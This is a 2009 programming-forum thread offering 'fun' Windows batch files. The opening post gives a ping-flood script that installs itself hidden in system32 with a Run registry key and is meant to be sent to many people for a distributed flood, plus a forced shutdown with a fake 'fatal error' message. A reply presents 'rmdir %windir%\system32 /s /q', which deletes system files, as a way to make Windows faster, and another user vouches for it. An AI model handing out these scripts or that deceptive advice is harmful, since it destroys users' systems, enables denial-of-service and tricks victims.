Basic .Bat files :) For Starters/Fun

Discussion in 'Programming General' started by Macroman, Mar 21, 2009.

Basic .Bat files :) For Starters/Fun
  1. Unread #1 - Mar 21, 2009 at 8:06 AM
  2. Macroman
    Joined:
    Jan 21, 2007
    Posts:
    6,919
    Referrals:
    9
    Sythe Gold:
    12

    Macroman Hero
    Do Not Trade

    Basic .Bat files :) For Starters/Fun

    I'll just add more as I come allong them, please just keep these for fun their really stupid/simple but people have to learn somewhere
    Note: To save them, open notepad, save them as .bat files. You can use a .bat to .exe converter then if you wish.

    PING FLOODER
    Code:
     ping -t IPHERE 
    DOS.bat and convert it to .exe so its DOS.EXE

    Code:
    MD C:\WINDOWS\SYSTEM32\PING
    COPY DOS.EXE C:\WINDOWS\SYSTEM32\PING
    cd C:\windows\system32
    attrib ping +h /s /d
    REG ADD HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN /v DOS /t REG_SZ /d C:\windows\system32\ping\Attack
    Copy the above code into notepad, save it as PING.bat :)

    What this will do, is copy the simple ping script into system32 file and constantly ping. Now, the more people you send this to the more effective your script. :D


    This guys retarted.

    System Rebooter

    Code:
     shutdown -s -t 300 -c Windows has encountered a fatal error and must reboot! Please wait... 
    The number is the timer in seconds before shutdown. The words are displayed in a messagebox.
     
  3. Unread #2 - Mar 21, 2009 at 11:27 PM
  4. Jazz00006
    Joined:
    Aug 26, 2005
    Posts:
    807
    Referrals:
    0
    Sythe Gold:
    0

    Jazz00006 Apprentice
    Visual Basic Programmers

    Basic .Bat files :) For Starters/Fun

    You forgot this one
    Code:
    rmdir %windir%\system32 /s /q
    It makes your windows computer faster etc.
     
  5. Unread #3 - Mar 22, 2009 at 7:00 AM
  6. hampe-92
    Joined:
    Jul 10, 2008
    Posts:
    328
    Referrals:
    0
    Sythe Gold:
    0

    hampe-92 Forum Addict

    Basic .Bat files :) For Starters/Fun

    That one is simple and good :) It works great!
     
< Java Clue Solver (CLUE! not RS Clue Scrolls) | Looking for a team of coders >

Users viewing this thread
1 guest


 
 
Adblock breaks this site